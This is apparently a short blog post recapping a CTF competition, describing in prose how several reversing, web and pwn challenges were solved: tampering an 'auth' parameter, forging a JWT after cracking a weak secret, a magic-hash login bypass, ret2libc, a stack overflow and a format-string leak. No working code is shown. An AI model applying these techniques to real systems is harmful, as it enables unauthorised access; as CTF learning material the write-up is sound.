I recently participated in DCTF2021 which was a beginner-intermediate jeopardy-style CTF hosted by DragonSI in Slovenia.

I was able to complete a few pwn, rev, and web challenges and provided writeups here: https://github.com/snix0/dctf-writeups

Rev

Bell

This was a simple reverse engineering problem which was made simpler thanks to Binary Ninja’s amazing high-level intermediate disassembly language. Multiple comparisons were done in a loop between the user input and the output of a function triangle.

I transcribed the triangle function to a simple Python script and used it to produce the inputs that the program needed in order to output the contents of the flag.

Web

Simple Web

This was a website where you could click a button to request the flag. Intercepting the request with burp, we realize that an argument “auth” is sent along with the other parameters. Simply setting the value of “auth” to 1 grants us access to the flag.

Secure API

This was a backend API which required JWT token authentication. We enumerated the login API which produced a valid JWT token for the “guest” account using easily guessable credentials. We cracked the password for the JWT token since it was using a weak encryption algorithm and tampered it so that the username for the JWT would be admin instead of guest. Doing so and changing the request to use our new tampered token allowed us to access the flag.

Very Secure Website

A known vulnerability in the comparison operator (magic hash) that was used in the login form was leveraged to bypass the password check in the login field. The username hash was a non-unique hash that was easily searchable online.

Pwn

Pwn Sanity Check

A ret2win problem which I did with a ret2libc approach. Leaked the address of puts and used a simple ROPchain to execute /bin/sh.

Pinch Me

Simple buffer overflow to overwrite a variable in the stack that was used for comparison to determine whether to print the flag or not.

Readme

Used the string format exploit to pop values from the stack until the contents of the flag were leaked.